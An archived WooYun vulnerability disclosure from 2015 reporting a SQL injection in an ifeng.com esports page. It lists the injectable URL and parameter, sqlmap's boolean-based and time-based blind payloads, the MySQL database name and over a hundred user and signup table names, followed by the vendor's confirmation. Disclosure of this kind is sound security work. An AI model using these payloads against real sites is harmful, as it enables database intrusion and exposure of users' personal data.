乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-04: 细节已通知厂商并且等待厂商处理中 2015-02-04: 厂商已经确认,细节仅向厂商公开 2015-02-14: 细节向核心白帽子及相关领域专家公开 2015-02-24: 细节向普通白帽子公开 2015-03-06: 细节向实习白帽子公开 2015-03-21: 细节向公众公开
凤凰网某站存在SQL注入#2(大量用户信息泄露)
注入点
http://esports.games.ifeng.com/sta/setuserin/?sid=dzshd1&user=
经检测参数sid存在注入
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:---Place: GETParameter: sid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=dzshd1' AND 8747=8747 AND 'gksS'='gksS&user= Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: sid=dzshd1' AND SLEEP(5) AND 'Jpnj'='Jpnj&user=---[23:48:08] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0.11
可获取数据库“esports_ifeng_93”
发现该数据库中有100多张表,应该是记录用户数据,目测很多。。。o(∩_∩)o
| contest_main || contest_type || game_list || game_type || hslist || ifeng_games_zhuanti || signup_userlist_1 || signup_userlist_10 || signup_userlist_11 || signup_userlist_12 || signup_userlist_13 || signup_userlist_14 || signup_userlist_15 || signup_userlist_16 || signup_userlist_17 || signup_userlist_18 || signup_userlist_19 || signup_userlist_2 || signup_userlist_20 || signup_userlist_21 || signup_userlist_22 || signup_userlist_23 || signup_userlist_24 || signup_userlist_25 || signup_userlist_26 || signup_userlist_27 || signup_userlist_28 || signup_userlist_29 || signup_userlist_3 || signup_userlist_30 || signup_userlist_31 || signup_userlist_32 || signup_userlist_33 || signup_userlist_34 || signup_userlist_35 || signup_userlist_36 || signup_userlist_37 || signup_userlist_38 || signup_userlist_39 || signup_userlist_4 || signup_userlist_40 || signup_userlist_41 || signup_userlist_42 || signup_userlist_43 || signup_userlist_44 || signup_userlist_45 || signup_userlist_46 || signup_userlist_47 || signup_userlist_48 || signup_userlist_49 || signup_userlist_5 || signup_userlist_50 || signup_userlist_51 || signup_userlist_52 || signup_userlist_53 || signup_userlist_54 || signup_userlist_55 || signup_userlist_56 || signup_userlist_57 || signup_userlist_58 || signup_userlist_59 || signup_userlist_6 || signup_userlist_60 || signup_userlist_61 || signup_userlist_62 || signup_userlist_63 || signup_userlist_64 || signup_userlist_65 || signup_userlist_66 || signup_userlist_67 || signup_userlist_68 || signup_userlist_69 || signup_userlist_7 || signup_userlist_70 || signup_userlist_71 || signup_userlist_72 || signup_userlist_73 || signup_userlist_74 || signup_userlist_75 || signup_userlist_76 || signup_userlist_77 || signup_userlist_78 || signup_userlist_79 || signup_userlist_8 || signup_userlist_9 || signup_userlist_tmplate || userinfo_list || userlist || warlist_1 || warlist_10 || warlist_11 || warlist_12 || warlist_13 || warlist_14 || warlist_15 || warlist_16 || warlist_17 || warlist_18 || warlist_19 || warlist_2 || warlist_20 || warlist_21 || warlist_22 || warlist_23 || warlist_24 || warlist_25 || warlist_26 || warlist_27 || warlist_28 || warlist_29 || warlist_3 || warlist_30 || warlist_31 || warlist_32 || warlist_33 || warlist_34 || warlist_35 || warlist_36 || warlist_37 || warlist_38 || warlist_39 || warlist_4 || warlist_40 || warlist_41 || warlist_42 || warlist_43 || warlist_44 || warlist_45 || warlist_46 || warlist_47 || warlist_48 || warlist_49 || warlist_5 || warlist_50 || warlist_51 || warlist_52 || warlist_53 || warlist_54 || warlist_55 || warlist_56 || warlist_57 || warlist_58 || warlist_59 || warlist_6 || warlist_60 || warlist_61 || warlist_62 || warlist_63 || warlist_65 || warlist_66 || warlist_67 || warlist_68 || warlist_69 || warlist_7 || warlist_70 || warlist_71 || warlist_72 || warlist_73 || warlist_74 || warlist_77 || warlist_78 || warlist_79 || warlist_8 || warlist_9 || warlist_tmplate |
猜解其中的signup_userlist_1表,只读取其中一条数据。。其他表及其数据并未涉及
望及时修复,这次会有20Rank么。。
过滤
危害等级:高
漏洞Rank:15
确认时间:2015-02-04 10:25
非常感谢您对凤凰网信息安全的帮助。
暂无